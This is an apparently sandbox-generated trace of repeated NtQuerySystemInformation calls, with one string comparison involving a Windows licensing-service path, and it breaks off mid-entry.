[0297.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x38, ResultLength=0x0) [0297.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec80, Length=0x28, ResultLength=0x0) [0297.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec80, Length=0x28, ResultLength=0x0) [0297.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x38, ResultLength=0x0) [0297.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebe0, Length=0x20, ResultLength=0x0) [0297.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb60, Length=0x20, ResultLength=0x0) [0297.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb60, Length=0x20, ResultLength=0x0) [0297.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb60, Length=0x20, ResultLength=0x0) [0297.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x38, ResultLength=0x0) [0297.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebe0, Length=0x20, ResultLength=0x0) [0297.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb70, Length=0x20, ResultLength=0x0) [0297.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb70, Length=0x20, ResultLength=0x0) [0297.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee30, Length=0x50, ResultLength=0x0) [0297.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217edb0, Length=0x28, ResultLength=0x0) [0297.839] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0297.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee30, Length=0x50, ResultLength=0x0) [0297.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee30, Length=0x50, ResultLength=0x0) [0297.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee30, Length=0x50, ResultLength=0x0) [0297.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x38, ResultLength=0x0) [0297.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb90, Length=0x28, ResultLength=0x0) [0297.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb90, Length=0x28, ResultLength=0x0) [0297.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb90, Length=0x28, ResultLength=0x0) [0297.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec00, Length=0x28, ResultLength=0x0) [0297.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x38, ResultLength=0x0) [0297.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec80, Length=0x28, ResultLength=0x0) [0297.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec80, Length=0x28, ResultLength=0x0) [0297.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x38, ResultLength=0x0) [0297.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebe0, Length=0x20, ResultLength=0x0) [0297.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb60, Length=0x20, ResultLength=0x0) [0297.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb60, Length=0x20, ResultLength=0x0) [0297.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb60, Length=0x20, ResultLength=0x0) [0297.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x38, ResultLength=0x0) [0297.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ebe0, Length=0x20, ResultLength=0x0) [0297.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb70, Length=0x20, ResultLength=0x0) [0297.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb70, Length=0x20, ResultLength=0x0) [0297.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb20, Length=0x50, ResultLength=0x0) [0297.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb20, Length=0x50, ResultLength=0x0) [0297.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb20, Length=0x50, ResultLength=0x0) [0297.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x50, ResultLength=0x0) [0297.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e940, Length=0x38, ResultLength=0x0) [0297.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e770, Length=0x28, ResultLength=0x0) [0297.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e770, Length=0x28, ResultLength=0x0) [0297.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e770, Length=0x28, ResultLength=0x0) [0297.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e770, Length=0x28, ResultLength=0x0) [0297.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e7e0, Length=0x28, ResultLength=0x0) [0297.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e940, Length=0x38, ResultLength=0x0) [0297.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e860, Length=0x28, ResultLength=0x0) [0297.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e860, Length=0x28, ResultLength=0x0) [0297.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e700, Length=0x20, ResultLength=0x0) [0297.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e680, Length=0x20, ResultLength=0x0) [0297.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e680, Length=0x20, ResultLength=0x0) [0297.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e680, Length=0x20, ResultLength=0x0) [0297.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e940, Length=0x38, ResultLength=0x0) [0297.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e940, Length=0x38, ResultLength=0x0) [0297.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e7c0, Length=0x20, ResultLength=0x0) [0297.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x20, ResultLength=0x0) [0297.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x20, ResultLength=0x0) [0297.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed80, Length=0x50, ResultLength=0x0) [0297.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed80, Length=0x50, ResultLength=0x0) [0297.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed80, Length=0x50, ResultLength=0x0) [0297.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec70, Length=0x50, ResultLength=0x0) [0297.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec70, Length=0x50, ResultLength=0x0) [0297.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec70, Length=0x50, ResultLength=0x0) [0297.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec70, Length=0x50, ResultLength=0x0) [0297.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eba0, Length=0x38, ResultLength=0x0) [0297.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9d0, Length=0x28, ResultLength=0x0) [0297.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9d0, Length=0x28, ResultLength=0x0) [0297.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9d0, Length=0x28, ResultLength=0x0) [0297.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea40, Length=0x28, ResultLength=0x0) [0297.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eba0, Length=0x38, ResultLength=0x0) [0297.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0297.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0297.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eba0, Length=0x38, ResultLength=0x0) [0297.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea20, Length=0x20, ResultLength=0x0) [0297.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9a0, Length=0x20, ResultLength=0x0) [0297.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9a0, Length=0x20, ResultLength=0x0) [0297.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9a0, Length=0x20, ResultLength=0x0) [0297.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eba0, Length=0x38, ResultLength=0x0) [0297.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea20, Length=0x20, ResultLength=0x0) [0297.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e9b0, Length=0x20, ResultLength=0x0) [0297.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0297.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.686] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0298.750] NtQuerySystemInformation 